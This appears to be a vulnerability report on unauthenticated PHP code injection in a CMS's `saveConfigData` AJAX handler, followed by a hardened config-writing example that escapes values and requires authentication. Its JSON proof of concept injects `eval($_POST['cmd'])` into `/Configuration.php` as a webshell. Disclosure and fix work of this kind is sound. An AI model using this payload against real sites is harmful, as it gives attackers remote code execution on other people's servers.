An unauthorized attacker can execute arbitrary PHP code via the `saveConfigData` function in `/classes/ajax/Functions.php`.

poc

then
![image](https://user-images.githubusercontent.com/38547290/154812136-8c78218f-51a0-4a53-957e-84606a2ba0c0.png)
`/Configuration.php` is your webshell; the password is `cmd`.

analysis
when parameter file is
after base64decode is
![image](https://user-images.githubusercontent.com/38547290/154812329-c3a50393-41d5-4c43-996a-85d655ffd43f.png)
```json
{"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}
```
We can inject code into the last line, and the final result is our shellcode injected into `/Configuration.php`.
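
A hardened way to write the settings, as an added example that is not the project's code. It assumes the config file is a PHP class with one public string property per setting; `renderConfig` and `ALLOWED_KEYS` are hypothetical names, and the key list is a sample subset.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Assumption: Configuration.php is a
// class with one public string property per setting.
const ALLOWED_KEYS = ['host', 'db', 'user', 'password', 'table_prefix', 'code'];

function renderConfig(string $fileParam): string
{
    $raw = base64_decode($fileParam, true);            // strict: reject non-base64
    if ($raw === false) {
        throw new InvalidArgumentException('file is not valid base64');
    }
    $data = json_decode($raw, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new InvalidArgumentException('expected a JSON object');
    }
    $lines = [];
    foreach ($data as $key => $value) {
        // Keys become PHP identifiers, so only known names are accepted.
        if (!in_array($key, ALLOWED_KEYS, true)) {
            throw new InvalidArgumentException('unknown setting');
        }
        if (!is_string($value)) {
            throw new InvalidArgumentException("setting $key must be a string");
        }
        // var_export() emits a single-quoted literal with ' and \ escaped,
        // so the value cannot terminate the string it is written into.
        $lines[] = sprintf('    public $%s = %s;', $key, var_export($value, true));
    }
    return "<?php\nclass Configuration {\n" . implode("\n", $lines) . "\n}\n";
}

// Constructed sample: a value with the same quote/brace breakout shape as the report.
$sample = ['host' => 'localhost', 'code' => 'it\'s \\ ";} echo 1; /*'];
$source = renderConfig(base64_encode(json_encode($sample)));

// Tokenize the generated file: each value must be exactly one string literal,
// and no statement token may appear anywhere in the output.
$ids = array_column(array_filter(token_get_all($source), 'is_array'), 0);
$strings = count(array_keys($ids, T_CONSTANT_ENCAPSED_STRING, true));
if ($strings !== count($sample) || in_array(T_ECHO, $ids, true)) {
    throw new RuntimeException('generated config contains code outside literals');
}
echo $source;
```

Escaping closes only the injection path. Since the report says the function is reachable by an unauthorized attacker, the handler also needs an authentication check before it writes anything.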